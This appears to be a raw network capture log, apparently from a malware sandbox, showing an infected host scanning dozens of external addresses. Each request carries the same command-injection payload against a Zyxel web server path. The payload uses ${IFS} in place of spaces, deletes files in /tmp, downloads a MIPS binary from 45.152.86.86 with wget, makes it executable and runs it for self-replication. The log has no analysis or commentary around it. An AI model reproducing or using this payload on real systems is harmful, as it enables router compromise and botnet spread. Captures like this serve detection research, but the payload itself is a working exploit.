                                        Mar 31, 2024 09:21:34.034302950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5276192.168.2.2356822160.173.157.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034348965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5277192.168.2.234510835.4.6.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034404993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5278192.168.2.2334678216.10.94.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034446001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5279192.168.2.234460836.12.208.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034496069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5280192.168.2.2340872202.66.197.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034552097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5281192.168.2.235954847.124.16.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034609079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5282192.168.2.2341308123.245.175.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034645081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5283192.168.2.2345314120.246.189.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034691095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5284192.168.2.2348478199.191.163.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034743071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5285192.168.2.2346746189.34.128.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034790039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5286192.168.2.235837662.109.42.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034830093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5287192.168.2.234870654.46.156.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034898043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5288192.168.2.2348398114.19.51.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034940004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5289192.168.2.235342619.89.110.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034980059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5290192.168.2.235077272.236.186.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035022974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5291192.168.2.2346228100.238.49.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035053015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5292192.168.2.233920823.5.133.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035104990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5293192.168.2.2334110161.152.92.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035154104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5294192.168.2.2343364130.245.164.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035208941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5295192.168.2.2337012160.249.68.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035249949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5296192.168.2.235445682.168.133.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035290003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5297192.168.2.2355136153.71.253.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035346985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5298192.168.2.233410081.153.244.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035387039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5299192.168.2.2356302125.63.211.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035444975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5300192.168.2.233711888.206.4.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035500050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5301192.168.2.233950217.175.227.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035547018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5302192.168.2.2342378174.225.228.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035588980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5303192.168.2.2352118133.153.46.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035641909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5304192.168.2.2337636206.42.11.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035686016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5305192.168.2.2336444198.211.106.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035737038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5306192.168.2.2356488222.19.180.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035784960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5307192.168.2.235622491.212.61.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035823107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5308192.168.2.2334498204.168.127.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035870075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5309192.168.2.2344454200.55.67.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035906076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5310192.168.2.235828875.237.200.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.035970926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5311192.168.2.2343708145.221.49.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036022902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5312192.168.2.2355042158.50.12.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036055088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5313192.168.2.2351648149.167.142.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036103010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5314192.168.2.2344096208.171.98.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036133051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5315192.168.2.2353430155.9.174.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036187887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5316192.168.2.2360600124.159.221.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036230087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5317192.168.2.2359818131.181.117.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036288977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5318192.168.2.2357126121.234.171.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036334991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5319192.168.2.2350910151.109.53.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036374092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5320192.168.2.2335568156.109.192.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036420107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5321192.168.2.235192419.168.36.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036462069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5322192.168.2.2357632216.246.59.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036493063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5323192.168.2.2338536197.220.214.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036561966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5324192.168.2.235781425.91.164.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036591053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5325192.168.2.235903091.141.29.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036638975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5326192.168.2.2353294138.96.253.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036684036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5327192.168.2.233964684.32.224.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036715031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5328192.168.2.235021857.99.93.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036777973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5329192.168.2.235906491.132.131.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036814928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5330192.168.2.2353546141.210.113.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036869049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5331192.168.2.2358860156.80.237.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036911011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5332192.168.2.235150243.38.202.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.036958933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5333192.168.2.2345128136.185.63.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037013054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5334192.168.2.234620837.89.61.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037058115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5335192.168.2.2333176135.29.195.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037106037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5336192.168.2.2359898131.61.190.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037149906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5337192.168.2.2332978104.244.251.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037211895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5338192.168.2.233587436.108.178.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037262917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5339192.168.2.233358024.50.130.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037308931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5340192.168.2.2353012148.3.90.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037358046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5341192.168.2.2336096165.223.83.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037415981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5342192.168.2.2342436131.250.34.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037446976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5343192.168.2.233516472.171.16.240443
                                        TimestampBytes transferredDirectionData
